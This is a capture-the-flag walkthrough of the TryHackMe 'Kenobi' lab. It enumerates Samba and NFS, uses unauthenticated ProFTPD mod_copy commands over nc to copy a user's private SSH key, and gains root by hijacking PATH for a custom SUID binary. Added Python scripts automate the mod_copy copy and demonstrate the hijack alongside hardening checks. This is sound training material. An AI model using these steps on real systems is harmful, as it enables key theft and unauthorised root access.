Kenobi – TryHackMe – Manual Writeup


February 28, 2021
Nextdoorsec-course

Intro

The Kenobi box will cover the following topics:

  • Enumeration of Samba shares and NFS exports
  • Exploitation of a vulnerable ProFTPD version (mod_copy) to copy a private SSH key
  • PATH variable manipulation against a custom SUID binary for privilege escalation

Enumeration

Nmap

Initial Nmap scan: 

  ┌──(kali㉿kali)-[~]
  └─$ nmap -A -v $IP
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         ProFTPD 1.3.5
22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 b3:ad:83:41:49:e9:5d:16:8d:3b:0f:05:7b:e2:c0:ae (RSA)
|   256 f8:27:7d:64:29:97:e6:f8:65:54:65:22:f7:c8:1d:8a (ECDSA)
|_  256 5a:06:ed:eb:b6:56:7e:4c:01:dd:ea:bc:ba:fa:33:79 (ED25519)
80/tcp   open  http        Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 1 disallowed entry
|_/admin.html
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
111/tcp  open  rpcbind     2-4 (RPC #100000)
| rpcinfo:
|   program version   port/proto  service
|   100000  2,3,4      111/tcp   rpcbind
|   100000  2,3,4      111/udp   rpcbind
|   100000  3,4        111/tcp6  rpcbind
|   100000  3,4        111/udp6  rpcbind
|   100003  2,3,4     2049/tcp   nfs
|   100003  2,3,4     2049/tcp6  nfs
|   100003  2,3,4     2049/udp   nfs
|   100003  2,3,4     2049/udp6  nfs
|   100005  1,2,3    40218/udp6  mountd
|   100005  1,2,3    43681/tcp6  mountd
|   100005  1,2,3    55583/udp   mountd
|   100005  1,2,3    59803/tcp   mountd
|   100021  1,3,4    37255/tcp6  nlockmgr
|   100021  1,3,4    41993/tcp   nlockmgr
|   100021  1,3,4    48289/udp   nlockmgr
|   100021  1,3,4    60413/udp6  nlockmgr
|   100227  2,3       2049/tcp   nfs_acl
|   100227  2,3       2049/tcp6  nfs_acl
|   100227  2,3       2049/udp   nfs_acl
|_  100227  2,3       2049/udp6  nfs_acl
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
2049/tcp open  nfs_acl     2-3 (RPC #100227)
Service Info: Host: KENOBI; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 1h59m58s, deviation: 3h27m51s, median: -1s
| nbstat: NetBIOS name: KENOBI, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
|   KENOBI<00>                    Flags:
|   KENOBI<03>                    Flags:
|   KENOBI<20>                    Flags:
|   \x01\x02__MSBROWSE__\x02<01>  Flags:
|   WORKGROUP<00>                 Flags:
|   WORKGROUP<1d>                 Flags:
|_  WORKGROUP<1e>                 Flags:
| smb-os-discovery:
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: kenobi
|   NetBIOS computer name: KENOBI\x00
|   Domain name: \x00
|   FQDN: kenobi
|_  System time: 2021-02-24T11:43:11-06:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2021-02-24T17:43:11
|_  start_date: N/A

The Apache server on port 80, ProFTPD 1.3.5 on port 21, the Samba shares on 139/445 and the NFS service advertised through rpcbind (111) and nfs (2049) get my immediate attention.

Nothing valuable on port 80, and brute-forcing directories and files with gobuster turned up nothing either.

Let’s enumerate the SMB shares and users with Nmap’s NSE scripts:

  ┌──(kali㉿kali)-[~]
  └─$ nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse $IP
PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb-enum-shares:
|   account_used: guest
|   \\10.10.100.215\IPC$:
|     Type: STYPE_IPC_HIDDEN
|     Comment: IPC Service (kenobi server (Samba, Ubuntu))
|     Users: 2
|     Max Users:
|     Path: C:\tmp
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\10.10.100.215\anonymous:
|     Type: STYPE_DISKTREE
|     Comment:
|     Users: 0
|     Max Users:
|     Path: C:\home\kenobi\share
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\10.10.100.215\print$:
|     Type: STYPE_DISKTREE
|     Comment: Printer Drivers
|     Users: 0
|     Max Users:
|     Path: C:\var\lib\samba\printers
|     Anonymous access:
|_    Current user access:

Anonymous (guest) access is READ/WRITE on two of the shares, IPC$ and anonymous; the latter is backed by /home/kenobi/share on the target.

Let’s inspect the anonymous share (smbclient asks for a password; just press Enter for a null session):

  ┌──(kali㉿kali)-[~]
  └─$ smbclient //$IP/anonymous
smb: \> ls
  .                                   D        0  Wed Sep  4 12:49:09 2019
  ..                                  D        0  Wed Sep  4 12:56:07 2019
  log.txt                             N    12237  Wed Sep  4 12:49:09 2019

                9204224 blocks of size 1024. 6877100 blocks available
smb: \> get log.txt

  ┌──(kali㉿kali)-[~]
  └─$ cat log.txt
Generating public/private rsa key pair.
Enter file in which to save the key (/home/kenobi/.ssh/id_rsa):
Created directory '/home/kenobi/.ssh'.
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /home/kenobi/.ssh/id_rsa.
Your public key has been saved in /home/kenobi/.ssh/id_rsa.pub.
The key fingerprint is:
SHA256:C17GWSl/v7KlUZrOwWxSyk+F7gYhVzsbfqkCIkr2d7Q kenobi@kenobi
The key's randomart image is:
...

log.txt shows that an RSA key pair was generated for the kenobi user in the default location (/home/kenobi/.ssh/id_rsa) and, since the passphrase prompts were answered with an empty passphrase, that the private key is unencrypted. Further down, the file also contains information about the ProFTPD service, including the user the daemon runs as.

NFS

Before starting the exploitation phase we still have some enumeration to do. rpcbind on port 111 advertised nfs (2049) and mountd earlier, so let’s enumerate the NFS exports:

  ┌──(kali㉿kali)-[~]
  └─$ nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount $IP
PORT    STATE SERVICE
111/tcp open  rpcbind
| nfs-showmount:
|_  /var *

Now we know that /var is exported to everyone (*) and can be mounted from our machine. Let’s keep that in mind, it will be the pick-up point for anything we manage to copy on the target, and move on to exploitation.

Exploitation

Searchsploit

We found ProFTPD’s version earlier, so let’s check for public exploits:

  ┌──(kali㉿kali)-[~]
  └─$ searchsploit proftpd 1.3.5
----------------------------------------------------------- ---------------------------------
 Exploit Title                                             |  Path
----------------------------------------------------------- ---------------------------------
ProFTPd 1.3.5 - 'mod_copy' Command Execution (Metasploit)  | linux/remote/37262.rb
ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution        | linux/remote/36803.py
ProFTPd 1.3.5 - File Copy                                  | linux/remote/36742.txt
----------------------------------------------------------- ---------------------------------

The third entry, 36742.txt, describes abusing the mod_copy module’s SITE CPFR and SITE CPTO commands (CVE-2015-3306). In ProFTPD 1.3.5 these commands are accepted before authentication, so an anonymous client can copy any file the ProFTPD process can read to any location it can write. No FTP client is needed for this; let’s talk to port 21 directly with nc.

From log.txt we know two things: the ProFTPD service runs as the kenobi user, and an SSH key pair was generated for that user, so /home/kenobi/.ssh/id_rsa is readable by the FTP daemon. The destination must be somewhere we can reach afterwards: /var/tmp is world-writable and sits inside the exported /var.

  ┌──(kali㉿kali)-[~]
  └─$ nc $IP 21
220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [10.10.100.215]
SITE CPFR /home/kenobi/.ssh/id_rsa
350 File or directory exists, ready for destination name
SITE CPTO /var/tmp/id_rsa
250 Copy successful
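The same exchange scripted, as an added example that is not part of the original writeup: a minimal FTP control-channel client that sends SITE CPFR and SITE CPTO and checks the reply codes, paired with an in-process stand-in for the vulnerable server so it can be run offline. The stand-in's replies are constructed to match the ones seen above; the 550 and 503 replies on the failure paths are assumptions, and FakeProFTPD, mod_copy, copy_succeeded and the paths the stand-in treats as readable are names chosen for this example.

```python
import socket
import threading


def read_reply(rd):
    """Read one FTP reply (single- or multi-line) and return (code, text)."""
    line = rd.readline()
    if not line:
        raise ConnectionError("server closed the control connection")
    code = line[:3]
    text = line.rstrip("\r\n")
    if line[3:4] == "-":                      # multi-line reply ends with "<code> "
        while True:
            more = rd.readline()
            if not more or (more[:3] == code and more[3:4] == " "):
                break
            text += "\n" + more.rstrip("\r\n")
    return int(code), text


def mod_copy(host, port, src, dst, timeout=10):
    """Drive SITE CPFR <src> / SITE CPTO <dst> on an unauthenticated session.

    Returns the transcript as [(command, reply code)]; the copy worked only
    if the codes read 220, 350, 250 in that order.
    """
    transcript = []
    with socket.create_connection((host, port), timeout=timeout) as sock:
        rd = sock.makefile("r", encoding="latin-1")   # universal newlines on read
        code, _ = read_reply(rd)
        transcript.append(("<banner>", code))
        if code == 220:
            for cmd, want in ((f"SITE CPFR {src}", 350), (f"SITE CPTO {dst}", 250)):
                sock.sendall((cmd + "\r\n").encode("latin-1"))
                code, _ = read_reply(rd)
                transcript.append((cmd, code))
                if code != want:              # stop at the first unexpected reply
                    break
        sock.sendall(b"QUIT\r\n")
    return transcript


def copy_succeeded(transcript):
    return [code for _, code in transcript] == [220, 350, 250]


class FakeProFTPD(threading.Thread):
    """Constructed stand-in for a ProFTPD 1.3.5 control channel. Assumption:
    only the replies seen in the writeup are modelled; 550/503 are guesses
    for the error paths. Serves one client on 127.0.0.1."""

    def __init__(self, readable=("/home/kenobi/.ssh/id_rsa",)):
        super().__init__(daemon=True)
        self.readable = set(readable)
        self.commands = []
        self.sock = socket.socket()
        self.sock.bind(("127.0.0.1", 0))
        self.sock.listen(1)
        self.port = self.sock.getsockname()[1]

    def run(self):
        conn, _ = self.sock.accept()
        with conn, conn.makefile("r", encoding="latin-1") as rd:
            conn.sendall(b"220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [127.0.0.1]\r\n")
            pending = None
            for line in rd:
                cmd = line.rstrip("\r\n")
                self.commands.append(cmd)
                if cmd.startswith("SITE CPFR "):
                    pending = cmd[len("SITE CPFR "):]
                    if pending in self.readable:
                        conn.sendall(b"350 File or directory exists, ready for destination name\r\n")
                    else:
                        pending = None
                        conn.sendall(b"550 No such file or directory\r\n")
                elif cmd.startswith("SITE CPTO "):
                    conn.sendall(b"250 Copy successful\r\n" if pending
                                 else b"503 Bad sequence of commands\r\n")
                    pending = None
                elif cmd == "QUIT":
                    conn.sendall(b"221 Goodbye.\r\n")
                    break
                else:
                    conn.sendall(b"500 Unknown command\r\n")


if __name__ == "__main__":
    server = FakeProFTPD()
    server.start()
    log = mod_copy("127.0.0.1", server.port, "/home/kenobi/.ssh/id_rsa", "/var/tmp/id_rsa")
    for cmd, code in log:
        print(f"{code}  {cmd}")
    print("copy succeeded:", copy_succeeded(log))
```

Against a real target you would call mod_copy with the box's address and port 21; checking for exactly 350 then 250 matters because a 550 on CPFR means the daemon cannot read the source, and anything other than 250 on CPTO means the destination is not writable for the FTP user.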

We can now mount the export locally and retrieve the copied key.

  ┌──(kali㉿kali)-[~]
  └─$ sudo mkdir /mnt/kenobiNFS

  ┌──(kali㉿kali)-[~]
  └─$ sudo mount $IP:/var /mnt/kenobiNFS

  ┌──(kali㉿kali)-[~]
  └─$ ls -la /mnt/kenobiNFS
total 56
drwxr-xr-x 14 root root    4096 Sep  4  2019 .
drwxr-xr-x  3 root root    4096 Feb 26 00:07 ..
drwxr-xr-x  2 root root    4096 Sep  4  2019 backups
drwxr-xr-x  9 root root    4096 Sep  4  2019 cache
drwxrwxrwt  2 root root    4096 Sep  4  2019 crash
drwxr-xr-x 40 root root    4096 Sep  4  2019 lib
drwxrwsr-x  2 root staff   4096 Apr 12  2016 local
lrwxrwxrwx  1 root root       9 Sep  4  2019 lock -> /run/lock
drwxrwxr-x 10 root crontab 4096 Sep  4  2019 log
drwxrwsr-x  2 root mail    4096 Feb 26  2019 mail
drwxr-xr-x  2 root root    4096 Feb 26  2019 opt
lrwxrwxrwx  1 root root       4 Sep  4  2019 run -> /run
drwxr-xr-x  2 root root    4096 Jan 29  2019 snap
drwxr-xr-x  5 root root    4096 Sep  4  2019 spool
drwxrwxrwt  6 root root    4096 Feb 25 23:54 tmp
drwxr-xr-x  3 root root    4096 Sep  4  2019 www

The target’s /var is now mounted on our machine and behaves like any local filesystem. The key we copied to /var/tmp is at /mnt/kenobiNFS/tmp/id_rsa on our side; grab it, fix its permissions and log in as kenobi.

  ┌──(kali㉿kali)-[~]
  └─$ cp /mnt/kenobiNFS/tmp/id_rsa .

  ┌──(kali㉿kali)-[~]
  └─$ sudo chmod 600 id_rsa

  ┌──(kali㉿kali)-[~]
  └─$ ssh -i id_rsa kenobi@$IP
kenobi@kenobi:~$ whoami
kenobi

ssh refuses to use a private key whose permissions are too open (it prints “UNPROTECTED PRIVATE KEY FILE!” and ignores the key), so the copied key must be readable by its owner only. The usual permissions are:
The .ssh directory should be 700 (drwx------).
The public key (.pub file) should be 644 (-rw-r--r--).
The private key (id_rsa) on the client, and the authorized_keys file on the server, should be 600 (-rw-------).
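A quick way to check those permissions before every ssh -i, as an added example that is not from the original writeup: walk a .ssh directory, compare each entry’s mode with the expected one and report anything too open. The rules encoded are the ones listed above (700 for the directory, 600 for private keys and authorized_keys, 644 for .pub files); treating known_hosts as 644 is this example’s assumption, and check_ssh_dir, tighten and make_sample are names chosen here.

```python
import os
import stat
import tempfile


def expected_mode(name, is_dir):
    """Expected permission bits, following the list above
    (known_hosts at 644 is this example's assumption)."""
    if is_dir:
        return 0o700
    if name.endswith(".pub") or name == "known_hosts":
        return 0o644
    return 0o600            # private keys, authorized_keys, config


def check_ssh_dir(ssh_dir):
    """Return [(name, actual, expected)] for the directory ('.') and every
    entry whose mode grants more than expected; [] means ssh will accept it."""
    problems = []
    entries = [(".", ssh_dir)] + [(n, os.path.join(ssh_dir, n))
                                  for n in sorted(os.listdir(ssh_dir))]
    for name, path in entries:
        st = os.lstat(path)
        if stat.S_ISLNK(st.st_mode):
            continue                                  # judge the target, not the link
        actual = stat.S_IMODE(st.st_mode)
        want = expected_mode(name, stat.S_ISDIR(st.st_mode))
        if actual & ~want:                            # a bit set that should not be
            problems.append((name, oct(actual), oct(want)))
    return problems


def tighten(ssh_dir):
    """chmod everything check_ssh_dir complains about; returns the count."""
    fixed = 0
    for name, _actual, want in check_ssh_dir(ssh_dir):
        target = ssh_dir if name == "." else os.path.join(ssh_dir, name)
        os.chmod(target, int(want, 8))
        fixed += 1
    return fixed


def make_sample():
    """Constructed .ssh directory with deliberately loose modes (example data)."""
    ssh_dir = os.path.join(tempfile.mkdtemp(), ".ssh")
    os.mkdir(ssh_dir)
    os.chmod(ssh_dir, 0o755)
    for name, mode in (("id_rsa", 0o644), ("id_rsa.pub", 0o644), ("authorized_keys", 0o664)):
        path = os.path.join(ssh_dir, name)
        with open(path, "w") as fh:
            fh.write("sample\n")
        os.chmod(path, mode)
    return ssh_dir


if __name__ == "__main__":
    for name, actual, want in check_ssh_dir(os.path.expanduser("~/.ssh")):
        print(f"{name}: {actual}, should be {want}")
```

The check only flags extra bits, so a key that is already stricter than 600 (say 400) passes, which is also what ssh accepts.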

Privilege Escalation

SUID

Let’s look for files/programs that have the SUID bit set:

kenobi@kenobi:~$ find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null
-rwsr-xr-x 1 root root 94240 May 8 2019 /sbin/mount.nfs
-rwsr-xr-x 1 root root 14864 Jan 15 2019 /usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-xr-- 1 root messagebus 42992 Jan 12 2017 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-sr-x 1 root root 98440 Jan 29 2019 /usr/lib/snapd/snap-confine
-rwsr-xr-x 1 root root 10232 Mar 27 2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 428240 Jan 31 2019 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 38984 Jun 14 2017 /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
-rwsr-xr-x 1 root root 49584 May 16 2017 /usr/bin/chfn
-rwsr-xr-x 1 root root 32944 May 16 2017 /usr/bin/newgidmap
-rwsr-xr-x 1 root root 23376 Jan 15 2019 /usr/bin/pkexec
-rwsr-xr-x 1 root root 54256 May 16 2017 /usr/bin/passwd
-rwsr-xr-x 1 root root 32944 May 16 2017 /usr/bin/newuidmap
-rwsr-xr-x 1 root root 75304 May 16 2017 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 8880 Sep 4 2019 /usr/bin/menu
-rwsr-xr-x 1 root root 136808 Jul 4 2017 /usr/bin/sudo
-rwsr-xr-x 1 root root 40432 May 16 2017 /usr/bin/chsh
-rwsr-xr-x 1 root root 39904 May 16 2017 /usr/bin/newgrp
-rwsr-xr-x 1 root root 27608 May 16 2018 /bin/umount
-rwsr-xr-x 1 root root 30800 Jul 12 2016 /bin/fusermount
-rwsr-xr-x 1 root root 40152 May 16 2018 /bin/mount
-rwsr-xr-x 1 root root 44168 May 7 2014 /bin/ping
-rwsr-xr-x 1 root root 40128 May 16 2017 /bin/su
-rwsr-xr-x 1 root root 44680 May 7 2014 /bin/ping6

SUID abuse is a common privilege-escalation technique: a binary with the SUID bit set runs with the effective UID of its owner, so a root-owned SUID binary that can be coaxed into running a command of our choosing hands us a root shell. An equivalent search that is not limited to root-owned files:
find / -perm -u=s -type f 2>/dev/null

GTFOBins usually tells you how to abuse a known binary with the SUID bit set, but /usr/bin/menu is custom-made (note its Sep 4 2019 timestamp, the same date the box was built, while everything else in the list comes from distribution packages), so it isn’t listed there. Let’s run it and see what it does:

kenobi@kenobi:~$ /usr/bin/menu

***************************************
1. status check
2. kernel version
3. ifconfig
** Enter your choice :

It executes a simple command for each choice. Let’s see what happens behind the scenes with strings, which prints the runs of printable characters found in a binary. The binary lives on the target, so run it there:

kenobi@kenobi:~$ strings /usr/bin/menu
***************************************
1. status check
2. kernel version
3. ifconfig
** Enter your choice :
curl -I localhost
uname -r
ifconfig

This shows that the commands are invoked by bare name rather than by absolute path (/usr/bin/curl, /bin/uname, /sbin/ifconfig), so whoever runs menu decides, through PATH, which curl, uname or ifconfig actually gets executed.
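The two manual steps above, find the SUID binaries and then strings the suspicious one, combined into a small audit, as an added example not taken from the writeup: find_suid walks a tree for regular files with the setuid bit, and unqualified_commands extracts printable strings the way strings(1) does and flags those whose first word is a bare command name that resolves on PATH. The function names, the heuristic and the sample "binary" are this example’s own; expect some false positives, because imported libc symbol names such as printf are also the names of utilities.

```python
import os
import re
import shutil
import stat
import tempfile


def find_suid(root="/", owner_uid=0):
    """Regular files under root with the setuid bit set, owned by owner_uid
    (None = any owner). Mirrors find / -user root -perm -4000."""
    hits = []
    for dirpath, _dirs, files in os.walk(root, onerror=lambda _e: None):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if not stat.S_ISREG(st.st_mode) or not st.st_mode & stat.S_ISUID:
                continue
            if owner_uid is None or st.st_uid == owner_uid:
                hits.append(path)
    return sorted(hits)


def printable_strings(path, min_len=4):
    """What strings(1) prints by default: runs of >= 4 printable ASCII bytes."""
    with open(path, "rb") as fh:
        data = fh.read()
    pattern = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    return [m.group().decode("ascii") for m in pattern.finditer(data)]


def unqualified_commands(path, search_path=None):
    """Strings whose first word is a bare (non-absolute) name that resolves on
    PATH: the trace a system("ifconfig") inside a SUID binary leaves behind."""
    found = []
    for s in printable_strings(path):
        head = s.split(" ", 1)[0]
        if "/" in head or not re.fullmatch(r"[A-Za-z0-9._+-]+", head):
            continue
        if shutil.which(head, path=search_path):
            found.append(s)
    return found


def make_sample_binary(directory=None):
    """Constructed stand-in for /usr/bin/menu: a few bytes carrying the same
    kind of strings the writeup's binary shows, with the setuid bit set."""
    directory = directory or tempfile.mkdtemp()
    path = os.path.join(directory, "menu")
    blob = b"\x7fELF\x00\x00" + b"\x00".join([
        b"** Enter your choice :", b"curl -I localhost", b"uname -r",
        b"ifconfig", b"/usr/bin/id -u", b"GCC: (Ubuntu 5.4.0)",
    ]) + b"\x00"
    with open(path, "wb") as fh:
        fh.write(blob)
    os.chmod(path, 0o4755)
    return path


if __name__ == "__main__":
    for binary in find_suid("/"):
        flagged = unqualified_commands(binary)
        if flagged:
            print(binary, "->", flagged)
```

Running the main block on a real host walks the whole filesystem and takes a while; in practice you would scope root to /usr, /bin, /sbin and /opt.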

The binary is SUID root, so the shell it spawns for each command, and whatever that shell resolves from PATH, runs with an effective UID of 0. PATH itself is inherited from our environment, and nothing in menu resets it.

kenobi@kenobi:~$ cd /tmp
kenobi@kenobi:/tmp$ echo /bin/sh > ifconfig
kenobi@kenobi:/tmp$ chmod 777 ifconfig
kenobi@kenobi:/tmp$ export PATH=/tmp:$PATH
kenobi@kenobi:/tmp$ /usr/bin/menu

***************************************
1. status check
2. kernel version
3. ifconfig
** Enter your choice :3
# whoami
root
#

First we move to /tmp and write /bin/sh into a new file called ifconfig; the file has no shebang, but when the shell’s execve() fails with ENOEXEC it falls back to interpreting the file as a script, which is good enough. Then we make it executable (chmod +x would do; 777 is more than needed) and prepend /tmp to PATH, so when menu’s option 3 runs ifconfig through the shell, the lookup finds /tmp/ifconfig first and our /bin/sh is started with the SUID binary’s root privileges. Note that /bin/sh on Ubuntu is dash, which keeps the elevated effective UID; bash would drop it unless started with -p.
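The hijack and its fix side by side, as an added example written for this page (not the writeup’s own code, with Python standing in for the C binary): run_menu_option mimics what menu does, handing a bare command to /bin/sh the way system(3) does, so whatever is first on PATH wins; run_hardened shows the fix a developer should apply, an absolute program path, no shell, and a PATH the caller cannot influence. The demo plants a fake uname (menu’s “kernel version” option) instead of ifconfig because uname exists on every Linux host; the HIJACKED marker and the function names are this example’s choices.

```python
import os
import shutil
import subprocess
import tempfile


def run_menu_option(command, path_env):
    """What the SUID menu effectively does: system("uname -r") becomes
    /bin/sh -c "uname -r", and the shell resolves the bare name through the
    caller-controlled PATH."""
    proc = subprocess.run(command, shell=True, capture_output=True, text=True,
                          env={"PATH": path_env})
    return proc.stdout.strip()


def run_hardened(argv, safe_path="/usr/sbin:/usr/bin:/sbin:/bin"):
    """The fix: absolute path, no shell, fixed PATH (a real SUID program
    would additionally drop privileges wherever it can)."""
    if not os.path.isabs(argv[0]):
        raise ValueError(f"refusing to run unqualified command {argv[0]!r}")
    proc = subprocess.run(argv, capture_output=True, text=True,
                          env={"PATH": safe_path})
    return proc.stdout.strip()


def plant_fake(directory, name, marker="HIJACKED"):
    """Drop a fake executable named like the target command (constructed payload,
    the equivalent of the writeup's echo /bin/sh > ifconfig)."""
    path = os.path.join(directory, name)
    with open(path, "w") as fh:
        fh.write(f"#!/bin/sh\necho {marker}\n")
    os.chmod(path, 0o755)
    return path


def demo(command="uname"):
    """Return (what the vulnerable call ran, what the hardened call ran)."""
    real = shutil.which(command, path="/usr/bin:/bin")
    with tempfile.TemporaryDirectory() as d:
        plant_fake(d, command)
        hijacked = run_menu_option(f"{command} -r", f"{d}:/usr/bin:/bin")
        hardened = run_hardened([real, "-r"])
    return hijacked, hardened


if __name__ == "__main__":
    weak, fixed = demo()
    print("vulnerable (PATH-resolved):", weak)
    print("hardened (absolute path):  ", fixed)
```

The first value is the marker from the planted script; the second is the real kernel release, because the hardened call never consulted the attacker’s PATH.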

I hope everything is clear. If not, let me know in the comments below.

Author: Aydan Arabadzha
